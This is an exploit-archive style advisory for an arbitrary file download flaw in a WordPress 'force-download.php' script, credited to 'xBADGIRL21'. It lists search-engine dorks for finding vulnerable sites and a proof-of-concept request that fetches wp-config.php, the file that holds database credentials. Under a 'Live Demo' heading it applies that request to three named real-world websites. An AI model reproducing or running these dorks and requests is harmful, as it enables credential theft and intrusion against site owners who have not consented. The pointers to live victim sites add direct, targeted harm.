###################### # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/_____/_/ _____/ ____|___|_| ______|_____|_| # ###################### # Exploit Title : Wordpress force download Arbitrary File Download # Dork 1 : inurl:force-download.php?file=wp-content/uploads # Dork 2 : inurl:wp-content/uploads inurl:force-download.php?file= # Vendor Homepage : http://elouai.com/force-download.php # Tested on: [ BACKBOX] # skype:xbadgirl21 # Date: 07/08/2016 # video Proof : https://www.youtube.com/watch?v=V3o_17be8zY ###################### # PoC ###################### # [+] Using `force-download.php` file from `Wordpress websites we can download any file. # # [!] http://localhost/force-download.php?file=wp-config.php # ###################### # Live Demo ###################### # [!] https://www.quantumib.com/force-download.php?file=wp-config.php # [!] https://help.jin-soku.biz/force-download.php?file=wp-config.php # [!] http://www.globalvoip.ca/force-download.php?file=wp-config.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################